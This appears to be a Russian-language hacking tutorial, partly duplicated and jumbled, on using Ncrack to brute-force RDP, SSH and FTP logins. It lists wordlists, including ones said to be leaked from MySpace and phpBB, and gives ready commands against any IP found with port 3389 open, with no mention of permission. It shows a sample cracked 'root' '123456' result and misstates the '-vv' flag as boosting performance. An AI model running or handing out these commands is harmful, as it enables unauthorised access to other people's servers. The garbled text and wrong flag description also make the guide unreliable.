Ncrack — программа для быстрого взлома RDP, SSH, FTP...
(Linux)
{
common.usr — Это усложнённый словарь логинов. Для простых целей не рекомендуется использовать.
default.pwd и default.usr — Это стандартные словари рекомендуемые для простых целей.
jtr.pwd — Это словарь паролей, которыми пользовались пользователи unix-подобных системы в середи 90-ых.
minimal.usr — Это короткий словарь логинов. Рекомендуется для слишком простых целей, или ограниченных ресурсах.
myspace.pwd — Скорее всего, это словарь паролей слитый с ресурса myspace
phpbb.pwd — То же, что и выше ^^^
top50000.pwd — Большой словарь паролей для сложных целей.
}
/*Команды очень похожи ,просто меняется порт*/
RDP(3389)
Нам нужны ip с открытым портом 3389
Допустим есть ip с открытым портом 3389
# ncrack -vv -U minimal.usr -P default.pwd xx.xx.xxx.xx:3389
***************
Разбираем команду:
-vv — для повышения производительности.
-U minimal.usr — указываем, чтобы программа загрузила словарь логинов из minimal.usr
-P default.pwd — то самое ,только уже пароли
xx.xx.xxx.xx:3389 — указываем цель в виде IP
ORT. Программа понимает, что это — RDP.
********
Программа начнет свою работу, чтобы узнать, что сейчас происходит, достаточно просто нажать два раза пробел. Как появится хотя бы один удачный результат, вы увидите
что-то вроде:
xx.xx.xx.xxx 3389/tcp rdp: 'root' '123456'
(Linux)
{
common.usr — Это усложнённый словарь логинов. Для простых целей не рекомендуется использовать.
default.pwd и default.usr — Это стандартные словари рекомендуемые для простых целей.
jtr.pwd — Это словарь паролей, которыми пользовались пользователи unix-подобных системы в середи 90-ых.
minimal.usr — Это короткий словарь логинов. Рекомендуется для слишком простых целей, или ограниченных ресурсах.
myspace.pwd — Скорее всего, это словарь паролей слитый с ресурса myspace
phpbb.pwd — То же, что и выше ^^^
top50000.pwd — Большой словарь паролей для сложных целей.
}
/*Команды очень похожи ,просто меняется порт*/
FTP(21)
# ncrack -vv -U default.usr -P default.pwd xx.xx.xx.xx:21
SSH(22)
# ncrack --user toor,root,admin -P passlist.txt xxx.xxx.xx.xx:22
# ncrack -vv -U default.usr -P default.pwd xx.xx.xx.xx:21
SSH(22)
# ncrack --user toor,root,admin -P passlist.txt xxx.xxx.xx.xx:22
RDP(3389)
Нам нужны ip с открытым портом 3389
Допустим есть ip с открытым портом 3389
# ncrack -vv -U minimal.usr -P default.pwd xx.xx.xxx.xx:3389
***************
Разбираем команду:
-vv — для повышения производительности.
-U minimal.usr — указываем, чтобы программа загрузила словарь логинов из minimal.usr
-P default.pwd — то самое ,только уже пароли
xx.xx.xxx.xx:3389 — указываем цель в виде IP
ORT. Программа понимает, что это — RDP.********
Программа начнет свою работу, чтобы узнать, что сейчас происходит, достаточно просто нажать два раза пробел. Как появится хотя бы один удачный результат, вы увидите
что-то вроде:
xx.xx.xx.xxx 3389/tcp rdp: 'root' '123456'
